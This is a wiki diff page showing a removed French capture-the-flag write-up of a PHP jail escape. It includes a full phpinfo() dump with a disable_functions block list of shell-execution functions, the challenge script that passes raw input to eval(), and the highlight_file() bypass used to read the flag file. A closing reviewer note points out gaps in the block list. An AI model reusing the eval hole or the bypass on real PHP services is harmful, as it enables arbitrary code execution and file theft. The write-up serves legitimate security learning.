challenges-anssi-ecsc-misc-php-jail

Differences

This shows you the differences between two versions of the page.

challenges-anssi-ecsc-misc-php-jail [2019/05/21 01:13] didzkovitchz
challenges-anssi-ecsc-misc-php-jail [2020/12/15 21:09] (current) – removed didzkovitchz
Line 1: Line 1:
-====== ANSSI ECSC ~~ Challenges misc ~~ PHP Jail ====== 
-[[anssi-ecsc|Retour]] 
  
-- 
- 
-===== Présentation ===== 
- 
-<code> 
-Saurez-vous sortir de cette prison PHP pour retrouver le fichier flag présent sur le système ? 
- 
-nc challenges.ecsc-teamfrance.fr 4002 
-</code> 
- 
-//Pas de fichier// 
-- 
- 
-===== 1 - Connexion ===== 
- 
-<code> 
-nc challenges.ecsc-teamfrance.fr 4002 
- 
-    /// PHP JAIL //// 
- 
-    There's a file named flag on this filesystem. 
-    Find it. 
-    Read it. 
-    Flag it. 
- 
- 
-Enter your command: 
- 
-Too slow! 
-Bye! 
-</code> 
- 
-===== 2 - Analyse ===== 
- 
-Après quelques recherches, je suis tombé sur l'article suivant qui m'a beaucoup aidé : [[http://blog.dornea.nu/2016/06/20/ringzer0-ctf-jail-escaping-php/]] 
- 
-La commande ''phpinfo();'' m'a retourné beaucoup d'informations, dont ''disable_functions'' ainsi que le nom du script et quelques autres informations. 
-<code> 
-phpinfo() 
-PHP Version => 7.0.33-0+deb9u3 
- 
-System => Linux phpjail 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 
-Build Date => Mar  8 2019 10:01:24 
-Server API => Command Line Interface 
-Virtual Directory Support => disabled 
-Configuration File (php.ini) Path => /etc/php/7.0/cli 
-Loaded Configuration File => /etc/php/7.0/cli/php.ini 
-Scan this dir for additional .ini files => /etc/php/7.0/cli/conf.d 
-Additional .ini files parsed => /etc/php/7.0/cli/conf.d/10-opcache.ini, 
-/etc/php/7.0/cli/conf.d/10-pdo.ini, 
-/etc/php/7.0/cli/conf.d/20-calendar.ini, 
-/etc/php/7.0/cli/conf.d/20-ctype.ini, 
-/etc/php/7.0/cli/conf.d/20-exif.ini, 
-/etc/php/7.0/cli/conf.d/20-fileinfo.ini, 
-/etc/php/7.0/cli/conf.d/20-ftp.ini, 
-/etc/php/7.0/cli/conf.d/20-gettext.ini, 
-/etc/php/7.0/cli/conf.d/20-iconv.ini, 
-/etc/php/7.0/cli/conf.d/20-json.ini, 
-/etc/php/7.0/cli/conf.d/20-phar.ini, 
-/etc/php/7.0/cli/conf.d/20-posix.ini, 
-/etc/php/7.0/cli/conf.d/20-readline.ini, 
-/etc/php/7.0/cli/conf.d/20-shmop.ini, 
-/etc/php/7.0/cli/conf.d/20-sockets.ini, 
-/etc/php/7.0/cli/conf.d/20-sysvmsg.ini, 
-/etc/php/7.0/cli/conf.d/20-sysvsem.ini, 
-/etc/php/7.0/cli/conf.d/20-sysvshm.ini, 
-/etc/php/7.0/cli/conf.d/20-tokenizer.ini 
- 
-PHP API => 20151012 
-PHP Extension => 20151012 
-Zend Extension => 320151012 
-Zend Extension Build => API320151012,NTS 
-PHP Extension Build => API20151012,NTS 
-Debug Build => no 
-Thread Safety => disabled 
-Zend Signal Handling => disabled 
-Zend Memory Manager => enabled 
-Zend Multibyte Support => disabled 
-IPv6 Support => enabled 
-DTrace Support => available, disabled 
- 
-Registered PHP Streams => https, ftps, compress.zlib, php, file, glob, data, http, ftp, phar 
-Registered Stream Socket Transports => tcp, udp, unix, udg, ssl, sslv2, tls, tlsv1.0, tlsv1.1, tlsv1.2 
-Registered Stream Filters => zlib.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, convert.iconv.* 
- 
-This program makes use of the Zend Scripting Language Engine: 
-Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies 
-    with Zend OPcache v7.0.33-0+deb9u3, Copyright (c) 1999-2017, by Zend Technologies 
- 
- 
- _______________________________________________________________________ 
- 
- 
-Configuration 
- 
-calendar 
- 
-Calendar support => enabled 
- 
-Core 
- 
-PHP Version => 7.0.33-0+deb9u3 
- 
-Directive => Local Value => Master Value 
-allow_url_fopen => Off => Off 
-allow_url_include => Off => Off 
-arg_separator.input => & => & 
-arg_separator.output => & => & 
-auto_append_file => no value => no value 
-auto_globals_jit => On => On 
-auto_prepend_file => no value => no value 
-browscap => no value => no value 
-default_charset => UTF-8 => UTF-8 
-default_mimetype => text/html => text/html 
-disable_classes => Directory, DirectoryIterator, FilesystemIterator, GlobIterator, RecursiveDirectoryIterator, SplFileObject, SplFileInfo => Directory, DirectoryIterator, FilesystemIterator, GlobIterator, RecursiveDirectoryIterator, SplFileObject, SplFileInfo 
-disable_functions => system, exec, shell_exec, passthru, show_source, popen, proc_open, fopen_with_path, dbmopen, dbase_open, move_uploaded_file, chdir, mkdir, rmdir, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo, fopen, fread, file_get_contents, readfile, opendir, readdir, scandir, glob, file, dir, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, virtual, openlog, closelog, ini_set, ini_restore, ignore_user_abort, link, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, is_dir => system, exec, shell_exec, passthru, show_source, popen, proc_open, fopen_with_path, dbmopen, dbase_open, move_uploaded_file, chdir, mkdir, rmdir, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo, fopen, fread, file_get_contents, readfile, opendir, readdir, scandir, glob, file, dir, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, 
posix_ttyname, posix_uname, virtual, openlog, closelog, ini_set, ini_restore, ignore_user_abort, link, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, is_dir 
-display_errors => Off => Off 
-display_startup_errors => Off => Off 
-doc_root => no value => no value 
-docref_ext => no value => no value 
-docref_root => no value => no value 
-enable_dl => Off => Off 
-enable_post_data_reading => On => On 
-error_append_string => no value => no value 
-error_log => /var/log/php_errors.log => /var/log/php_errors.log 
-error_prepend_string => no value => no value 
-error_reporting => 0 => 0 
-exit_on_timeout => Off => Off 
-expose_php => Off => Off 
-extension_dir => /usr/lib/php/20151012 => /usr/lib/php/20151012 
-file_uploads => Off => Off 
-highlight.comment => <font style="color: #FF8000">#FF8000</font> => <font style="color: #FF8000">#FF8000</font> 
-highlight.default => <font style="color: #0000BB">#0000BB</font> => <font style="color: #0000BB">#0000BB</font> 
-highlight.html => <font style="color: #000000">#000000</font> => <font style="color: #000000">#000000</font> 
-highlight.keyword => <font style="color: #007700">#007700</font> => <font style="color: #007700">#007700</font> 
-highlight.string => <font style="color: #DD0000">#DD0000</font> => <font style="color: #DD0000">#DD0000</font> 
-html_errors => Off => Off 
-ignore_repeated_errors => Off => Off 
-ignore_repeated_source => Off => Off 
-ignore_user_abort => Off => Off 
-implicit_flush => On => On 
-include_path => .:/usr/share/php => .:/usr/share/php 
-input_encoding => no value => no value 
-internal_encoding => no value => no value 
-log_errors => On => On 
-log_errors_max_len => 1024 => 1024 
-mail.add_x_header => On => On 
-mail.force_extra_parameters => no value => no value 
-mail.log => no value => no value 
-max_execution_time => 0 => 0 
-max_file_uploads => 20 => 20 
-max_input_nesting_level => 64 => 64 
-max_input_time => -1 => -1 
-max_input_vars => 1000 => 1000 
-memory_limit => -1 => -1 
-open_basedir => no value => no value 
-output_buffering => 0 => 0 
-output_encoding => no value => no value 
-output_handler => no value => no value 
-post_max_size => 8M => 8M 
-precision => 14 => 14 
-realpath_cache_size => 4096K => 4096K 
-realpath_cache_ttl => 120 => 120 
-register_argc_argv => On => On 
-report_memleaks => On => On 
-report_zend_debug => Off => Off 
-request_order => GP => GP 
-sendmail_from => no value => no value 
-sendmail_path => /usr/sbin/sendmail -t -i  => /usr/sbin/sendmail -t -i 
-serialize_precision => 17 => 17 
-short_open_tag => Off => Off 
-SMTP => localhost => localhost 
-smtp_port => 25 => 25 
-sql.safe_mode => Off => Off 
-sys_temp_dir => no value => no value 
-track_errors => Off => Off 
-unserialize_callback_func => no value => no value 
-upload_max_filesize => 2M => 2M 
-upload_tmp_dir => no value => no value 
-user_dir => no value => no value 
-user_ini.cache_ttl => 300 => 300 
-user_ini.filename => .user.ini => .user.ini 
-variables_order => GPCS => GPCS 
-xmlrpc_error_number => 0 => 0 
-xmlrpc_errors => Off => Off 
-zend.assertions => -1 => -1 
-zend.detect_unicode => On => On 
-zend.enable_gc => On => On 
-zend.multibyte => Off => Off 
-zend.script_encoding => no value => no value 
- 
-ctype 
- 
-ctype functions => enabled 
- 
-date 
- 
-date/time support => enabled 
-timelib version => 2016.02 
-"Olson" Timezone Database Version => 0.system 
-Timezone Database => internal 
-Default timezone => Europe/Berlin 
- 
-Directive => Local Value => Master Value 
-date.default_latitude => 31.7667 => 31.7667 
-date.default_longitude => 35.2333 => 35.2333 
-date.sunrise_zenith => 90.583333 => 90.583333 
-date.sunset_zenith => 90.583333 => 90.583333 
-date.timezone => no value => no value 
- 
-exif 
- 
-EXIF Support => enabled 
-EXIF Version => 7.0.33-0+deb9u3 
-Supported EXIF Version => 0220 
-Supported filetypes => JPEG,TIFF 
- 
-Directive => Local Value => Master Value 
-exif.decode_jis_intel => JIS => JIS 
-exif.decode_jis_motorola => JIS => JIS 
-exif.decode_unicode_intel => UCS-2LE => UCS-2LE 
-exif.decode_unicode_motorola => UCS-2BE => UCS-2BE 
-exif.encode_jis => no value => no value 
-exif.encode_unicode => ISO-8859-15 => ISO-8859-15 
- 
-fileinfo 
- 
-fileinfo support => enabled 
-version => 1.0.5 
-libmagic => 522 
- 
-filter 
- 
-Input Validation and Filtering => enabled 
-Revision => $Id: 28fcca4bfda9c9907588a64d245b49cb398249d8 $ 
- 
-Directive => Local Value => Master Value 
-filter.default => unsafe_raw => unsafe_raw 
-filter.default_flags => no value => no value 
- 
-ftp 
- 
-FTP support => enabled 
-FTPS support => enabled 
- 
-gettext 
- 
-GetText Support => enabled 
- 
-hash 
- 
-hash support => enabled 
-Hashing Engines => md2 md4 md5 sha1 sha224 sha256 sha384 sha512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5 
- 
-MHASH support => Enabled 
-MHASH API Version => Emulated Support 
- 
-iconv 
- 
-iconv support => enabled 
-iconv implementation => glibc 
-iconv library version => 2.24 
- 
-Directive => Local Value => Master Value 
-iconv.input_encoding => no value => no value 
-iconv.internal_encoding => no value => no value 
-iconv.output_encoding => no value => no value 
- 
-json 
- 
-json support => enabled 
-json version => 1.4.0 
- 
-libxml 
- 
-libXML support => active 
-libXML Compiled Version => 2.9.4 
-libXML Loaded Version => 20904 
-libXML streams => enabled 
- 
-openssl 
- 
-OpenSSL support => enabled 
-OpenSSL Library Version => OpenSSL 1.1.0j  20 Nov 2018 
-OpenSSL Header Version => OpenSSL 1.1.0j  20 Nov 2018 
-Openssl default config => /usr/lib/ssl/openssl.cnf 
- 
-Directive => Local Value => Master Value 
-openssl.cafile => no value => no value 
-openssl.capath => no value => no value 
- 
-pcntl 
- 
-pcntl support => enabled 
- 
-pcre 
- 
-PCRE (Perl Compatible Regular Expressions) Support => enabled 
-PCRE Library Version => 8.39 2016-06-14 
-PCRE JIT Support => enabled 
- 
-Directive => Local Value => Master Value 
-pcre.backtrack_limit => 1000000 => 1000000 
-pcre.jit => 1 => 1 
-pcre.recursion_limit => 100000 => 100000 
- 
-PDO 
- 
-PDO support => enabled 
-PDO drivers => 
- 
-Phar 
- 
-Phar: PHP Archive support => enabled 
-Phar EXT version => 2.0.2 
-Phar API version => 1.1.1 
-SVN revision => $Id: 308c1e92e8ad12e51f5db846d3366fdf3487eb21 $ 
-Phar-based phar archives => enabled 
-Tar-based phar archives => enabled 
-ZIP-based phar archives => enabled 
-gzip compression => enabled 
-bzip2 compression => disabled (install pecl/bz2) 
-Native OpenSSL support => enabled 
- 
- 
-Phar based on pear/PHP_Archive, original concept by Davey Shafik. 
-Phar fully realized by Gregory Beaver and Marcus Boerger. 
-Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle. 
-Directive => Local Value => Master Value 
-phar.cache_list => no value => no value 
-phar.readonly => On => On 
-phar.require_hash => On => On 
- 
-posix 
- 
-Revision => $Id: b691ca925e7a085e6929579c4eba8fed0732e0ef $ 
- 
-readline 
- 
-Readline Support => enabled 
-Readline library => EditLine wrapper 
- 
-Directive => Local Value => Master Value 
-cli.pager => no value => no value 
-cli.prompt => \b \>  => \b \> 
- 
-Reflection 
- 
-Reflection => enabled 
-Version => $Id: e5303663dcb329e17818853ff223e5ee01481f2c $ 
- 
-session 
- 
-Session Support => enabled 
-Registered save handlers => files user 
-Registered serializer handlers => php_serialize php php_binary 
- 
-Directive => Local Value => Master Value 
-session.auto_start => Off => Off 
-session.cache_expire => 180 => 180 
-session.cache_limiter => nocache => nocache 
-session.cookie_domain => no value => no value 
-session.cookie_httponly => Off => Off 
-session.cookie_lifetime => 0 => 0 
-session.cookie_path => / => / 
-session.cookie_secure => Off => Off 
-session.entropy_file => /dev/urandom => /dev/urandom 
-session.entropy_length => 32 => 32 
-session.gc_divisor => 1000 => 1000 
-session.gc_maxlifetime => 1440 => 1440 
-session.gc_probability => 0 => 0 
-session.hash_bits_per_character => 5 => 5 
-session.hash_function => 0 => 0 
-session.lazy_write => On => On 
-session.name => PHPSESSID => PHPSESSID 
-session.referer_check => no value => no value 
-session.save_handler => files => files 
-session.save_path => /var/lib/php/sessions => /var/lib/php/sessions 
-session.serialize_handler => php => php 
-session.upload_progress.cleanup => On => On 
-session.upload_progress.enabled => On => On 
-session.upload_progress.freq => 1% => 1% 
-session.upload_progress.min_freq => 1 => 1 
-session.upload_progress.name => PHP_SESSION_UPLOAD_PROGRESS => PHP_SESSION_UPLOAD_PROGRESS 
-session.upload_progress.prefix => upload_progress_ => upload_progress_ 
-session.use_cookies => On => On 
-session.use_only_cookies => On => On 
-session.use_strict_mode => Off => Off 
-session.use_trans_sid => 0 => 0 
- 
-shmop 
- 
-shmop support => enabled 
- 
-sockets 
- 
-Sockets Support => enabled 
- 
-SPL 
- 
-SPL support => enabled 
-Interfaces => Countable, OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject 
-Classes => AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException 
- 
-standard 
- 
-Dynamic Library Support => enabled 
-Path to sendmail => /usr/sbin/sendmail -t -i 
- 
-Directive => Local Value => Master Value 
-assert.active => 1 => 1 
-assert.bail => 0 => 0 
-assert.callback => no value => no value 
-assert.exception => 0 => 0 
-assert.quiet_eval => 0 => 0 
-assert.warning => 1 => 1 
-auto_detect_line_endings => 0 => 0 
-default_socket_timeout => 60 => 60 
-from => no value => no value 
-url_rewriter.tags => a=href,area=href,frame=src,input=src,form=fakeentry => a=href,area=href,frame=src,input=src,form=fakeentry 
-user_agent => no value => no value 
- 
-sysvmsg 
- 
-sysvmsg support => enabled 
-Revision => $Id: dfb999763f95bfe9609fae60b4e07a492888ec7c $ 
- 
-sysvsem 
- 
-Version => 7.0.33-0+deb9u3 
- 
-sysvshm 
- 
-Version => 7.0.33-0+deb9u3 
- 
-tokenizer 
- 
-Tokenizer Support => enabled 
- 
-Zend OPcache 
- 
-Opcode Caching => Disabled 
-Optimization => Disabled 
-SHM Cache => Enabled 
-File Cache => Disabled 
-Startup Failed => Opcode Caching is disabled for CLI 
- 
-Directive => Local Value => Master Value 
-opcache.blacklist_filename => no value => no value 
-opcache.consistency_checks => 0 => 0 
-opcache.dups_fix => Off => Off 
-opcache.enable => On => On 
-opcache.enable_cli => Off => Off 
-opcache.enable_file_override => Off => Off 
-opcache.error_log => no value => no value 
-opcache.fast_shutdown => 0 => 0 
-opcache.file_cache => no value => no value 
-opcache.file_cache_consistency_checks => 1 => 1 
-opcache.file_cache_only => 0 => 0 
-opcache.file_update_protection => 2 => 2 
-opcache.force_restart_timeout => 180 => 180 
-opcache.huge_code_pages => Off => Off 
-opcache.inherited_hack => On => On 
-opcache.interned_strings_buffer => 4 => 4 
-opcache.lockfile_path => /tmp => /tmp 
-opcache.log_verbosity_level => 1 => 1 
-opcache.max_accelerated_files => 2000 => 2000 
-opcache.max_file_size => 0 => 0 
-opcache.max_wasted_percentage => 5 => 5 
-opcache.memory_consumption => 64 => 64 
-opcache.optimization_level => 0x7FFFBFFF => 0x7FFFBFFF 
-opcache.preferred_memory_model => no value => no value 
-opcache.protect_memory => 0 => 0 
-opcache.restrict_api => no value => no value 
-opcache.revalidate_freq => 2 => 2 
-opcache.revalidate_path => Off => Off 
-opcache.save_comments => 1 => 1 
-opcache.use_cwd => On => On 
-opcache.validate_permission => Off => Off 
-opcache.validate_root => Off => Off 
-opcache.validate_timestamps => On => On 
- 
-zlib 
- 
-ZLib Support => enabled 
-Stream Wrapper => compress.zlib:// 
-Stream Filter => zlib.inflate, zlib.deflate 
-Compiled Version => 1.2.8 
-Linked Version => 1.2.8 
- 
-Directive => Local Value => Master Value 
-zlib.output_compression => Off => Off 
-zlib.output_compression_level => -1 => -1 
-zlib.output_handler => no value => no value 
- 
-Additional Modules 
- 
-Module Name 
- 
-Environment 
- 
-Variable => Value 
-USERNAME => user0 
-SUDO_COMMAND => /usr/bin/python /home/user0/server.py 
-TERM => linux 
-SHELL => /bin/zsh 
-HOSTNAME => phpjail 
-SUDO_UID => 0 
-SUDO_GID => 0 
-LOGNAME => user0 
-USER => user0 
-PATH => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 
-MAIL => /var/mail/user0 
-SUDO_USER => root 
-HOME => /home/user0 
- 
-PHP Variables 
- 
-Variable => Value 
-$_SERVER['USERNAME'] => user0 
-$_SERVER['SUDO_COMMAND'] => /usr/bin/python /home/user0/server.py 
-$_SERVER['TERM'] => linux 
-$_SERVER['SHELL'] => /bin/zsh 
-$_SERVER['HOSTNAME'] => phpjail 
-$_SERVER['SUDO_UID'] => 0 
-$_SERVER['SUDO_GID'] => 0 
-$_SERVER['LOGNAME'] => user0 
-$_SERVER['USER'] => user0 
-$_SERVER['PATH'] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 
-$_SERVER['MAIL'] => /var/mail/user0 
-$_SERVER['SUDO_USER'] => root 
-$_SERVER['HOME'] => /home/user0 
-$_SERVER['PHP_SELF'] => /home/user0/main.php 
-$_SERVER['SCRIPT_NAME'] => /home/user0/main.php 
-$_SERVER['SCRIPT_FILENAME'] => /home/user0/main.php 
-$_SERVER['PATH_TRANSLATED'] => /home/user0/main.php 
-$_SERVER['DOCUMENT_ROOT'] => 
-$_SERVER['REQUEST_TIME_FLOAT'] => 1558366469.9093 
-$_SERVER['REQUEST_TIME'] => 1558366469 
-$_SERVER['argv'] => Array 
-( 
-    [0] => /home/user0/main.php 
-) 
- 
-$_SERVER['argc'] => 1 
- 
-PHP License 
-This program is free software; you can redistribute it and/or modify 
-it under the terms of the PHP License as published by the PHP Group 
-and included in the distribution in the file:  LICENSE 
- 
-This program is distributed in the hope that it will be useful, 
-but WITHOUT ANY WARRANTY; without even the implied warranty of 
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
- 
-If you did not receive a copy of the PHP license, or have any 
-questions about PHP licensing, please contact license@php.net. 
-</code> 
- 
-Je ne suis pas habitué des jails PHP, donc j'ai cherché un peu et puis j'ai trouvé 2 fonctions PHP bien utiles pour m'aider : ''highlight_file()'' et ''is_file()'' ; ces fonctions ne sont pas dans la "blacklist". 
- 
-J'ai ainsi pu obtenir le contenu du fichier ''/home/user0/main.php'' (script lancé) : 
-<code> 
-<?php 
- 
-//ini_set('display_errors', 'off'); 
-//ini_set('error_reporting', ''); 
-//ini_set('max_execution_time', 10); 
- 
-echo "Enter your command: "; $command = readline(); 
- 
-try { 
-    @eval('fclose(STDERR); '.$command); 
- 
-} catch (ParseError $e) { 
- 
-    die('Parse error, or something.'); 
-} 
- 
-?> 
-</code> 
- 
-J'ai aussi regardé le contenu du fichier ''/home/user0/server.py'' mais ça ne m'a rien apporté, idem pour ''/etc/passwd''. 
- 
-Un ''echo(is_file('/tmp/flag'));'' m'a permis d'identifier la présence du fichier ''flag'' dans ''/tmp'' (endroit le + probable). 
- 
-Enfin le Graal : ''highlight_file('/tmp/flag');'' 
- 
-<code> 
-<span style="color: #000000"> 
-ECSC{8b63211197414118f6f9dcec6dead359002705c5}</span> 
-</code> 
- 
-===== 3 - FLAG ===== 
- 
-Le flag que j'ai trouvé est donc ''ECSC{8b63211197414118f6f9dcec6dead359002705c5}'' mais lorsque je le saisis sur l'interface web du concours, j'ai le message "INCORRECT". 
- 
-Il n'y a pourtant aucun caractère étrange ni rien à priori dans ce que j'ai copié/collé... 
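
Review bot: the disable_functions row in section 2 lists show_source but not its alias highlight_file, and it contains the entry "posix, _getppid", which splits into two names that match no function, so posix_getppid is not actually disabled; with open_basedir => no value on top of that, the highlight_file('/tmp/flag') call later in the page is left unblocked. Removing the page wholesale discards that observation together with the dump. I would rather keep a trimmed revision that retains the disable_functions, disable_classes and open_basedir rows and the main.php listing, drops the rest of the phpinfo() output (the Environment and $_SERVER blocks add nothing beyond /home/user0/main.php), and redacts the flag string in section 3, since the old revision stays readable through this comparison view.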
challenges-anssi-ecsc-misc-php-jail.1558394003.txt.gz · Last modified: 2019/05/21 01:13 by didzkovitchz